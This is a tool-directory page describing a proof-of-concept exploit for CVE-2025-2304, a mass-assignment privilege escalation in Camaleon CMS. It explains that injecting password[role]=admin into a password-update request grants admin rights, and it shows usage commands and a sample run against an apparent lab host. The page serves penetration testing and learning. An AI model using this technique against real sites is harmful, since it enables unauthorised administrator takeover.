Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-2304-PoC — PoC for CVE-2025-2304 Privilege Escalation in the Camaleon CMS | Kitploit
Tools/GitHubGitHub/lil0xplorer/cve-2025-2304-poc
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHublil0xplorer/cve-2025-2304-poc

CVE-2025-2304-PoC

PoC for CVE-2025-2304 Privilege Escalation in the Camaleon CMS

View Repository
6 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-2304 Exploit

Camaleon CMS Vulnerable to Privilege Escalation through a Mass Assignment

Vulnerability Description

A Privilege Escalation through a Mass Assignment exists in Camaleon CMS

When a user wishes to change his password, the 'updated_ajax' method of the UsersController is called. The vulnerability stems from the use of the dangerous permit! method, which allows all parameters to pass through without any filtering.

Requirements

root@kitploit:~
pip install requests beautifulsoup4

Usage

root@kitploit:~
python exploit.py --url http://target.com -u username -p password

Arguments

  • --url - Base URL of the vulnerable application
  • -u - Username for authentication
  • -p - Password for authentication

Example

root@kitploit:~
python exploit.py --url http://facts.htb -u krrish -p krrish

Output:

root@kitploit:~
[*] Logging in as krrish...
[*] Exploiting...
[+] Exploited! You're admin now

How It Works

  1. Authenticates with provided credentials
  2. Sends password update request with injected password[role]=admin parameter
  3. Escalates user privileges to administrator

Disclaimer

This tool is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.

Author

https://x.com/krrishbhurani

https://www.linkedin.com/in/krrish-bhurani/

Download Tool